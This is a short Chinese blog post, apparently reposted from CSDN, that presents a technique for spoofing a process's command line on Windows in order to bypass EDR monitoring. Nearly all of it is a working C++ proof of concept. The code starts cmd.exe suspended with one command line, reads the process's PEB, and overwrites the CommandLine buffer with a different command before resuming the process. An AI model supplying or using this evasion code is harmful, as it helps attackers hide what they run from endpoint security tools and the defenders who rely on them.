创建进程时伪造命令行
作者:互联网
这招可以用来bypass一些EDR监控创建进程时的命令行参数。
例如创建cmd进程时指定的参数是 wmic xxxx
但其实真实执行的是其他命令,powershell同理
#include "stdafx.h"
#include <windows.h>
#include <winternl.h>
typedef NTSTATUS(WINAPI *_NtQueryInformationProcess)(
_In_ HANDLE ProcessHandle,
_In_ PROCESSINFOCLASS ProcessInformationClass,
_Out_ PVOID ProcessInformation,
_In_ ULONG ProcessInformationLength,
_Out_opt_ PULONG ReturnLength
);
int main()
{
STARTUPINFOA si = { sizeof(STARTUPINFOA) };
PROCESS_INFORMATION pi = {};
CreateProcessA(NULL, "c:\\windows\\system32\\cmd.exe /c calc.exe", NULL, NULL, NULL, CREATE_NO_WINDOW | CREATE_SUSPENDED, NULL, NULL, &si, &pi);
USHORT usCmdLen = 0;
USHORT usPathLen = 0;
_NtQueryInformationProcess NtQueryInformationProcess = (_NtQueryInformationProcess)::GetProcAddress(
LoadLibraryA("ntdll.dll"), "NtQueryInformationProcess");
PROCESS_BASIC_INFORMATION pbi = { 0 };
NTSTATUS status = NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), NULL);
PEB peb = { 0 };
ReadProcessMemory(pi.hProcess, pbi.PebBaseAddress, &peb, sizeof(peb), NULL);
RTL_USER_PROCESS_PARAMETERS Param = { 0 };
ReadProcessMemory(pi.hProcess, peb.ProcessParameters, &Param, sizeof(Param), NULL);
// 备份原命令行
WCHAR szString[0x200] = {};
DWORD oldSize = Param.CommandLine.Length;
ReadProcessMemory(pi.hProcess, Param.CommandLine.Buffer, szString, Param.CommandLine.Length*2, NULL);
// 写入要执行的命令行
WCHAR *szStringWrite = L"c:\\windows\\system32\\cmd.exe /c notepad.exe";
WriteProcessMemory(pi.hProcess, Param.CommandLine.Buffer, szStringWrite, (wcslen(szStringWrite) + 1) * 2, NULL);
ResumeThread(pi.hThread);
return 0;
}
标签:pi,创建,CommandLine,Param,命令行,NULL,伪造,NtQueryInformationProcess,hProcess 来源: https://blog.csdn.net/cssxn/article/details/89680843